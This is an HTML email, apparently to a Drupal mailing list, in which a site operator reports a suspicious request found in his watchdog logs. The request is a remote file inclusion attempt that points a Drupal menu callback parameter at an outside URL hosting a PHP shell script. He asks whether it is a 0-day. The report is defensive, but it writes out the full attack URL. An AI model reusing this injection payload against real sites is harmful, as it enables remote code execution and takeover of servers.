<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
</head>
<body bgcolor="#ffffff" text="#cc0000">
<font size="+1"><font face="Arial">Hi, I have see this url into my
watchdog logs:<br>
<br>
</font></font><a
 href="http://www.ziobudda.net/rilasciato_drupal_6_beta1/drupal/?_menu%5Bcallbacks%5D%5B1%5D%5Bcallback%5D=http://my3dwork.com/images/on.txt?">drupal/?_menu[callbacks][1][callback]=http://my3dwork.com/images/on.txt?</a><br>
<br>
where <a
 href="http://www.ziobudda.net/rilasciato_drupal_6_beta1/drupal/?_menu%5Bcallbacks%5D%5B1%5D%5Bcallback%5D=http://my3dwork.com/images/on.txt?">http://my3dwork.com/images/on.txt</a>
is  a php shell script.<br>
<br>
any 0-day bug ? <br>
<br>
I have tried to exec it on my site without "drupal/" and the result is
that the browser is redirect to the homepage.<br>
<br>
<br>
M.<br>
</body>
</html>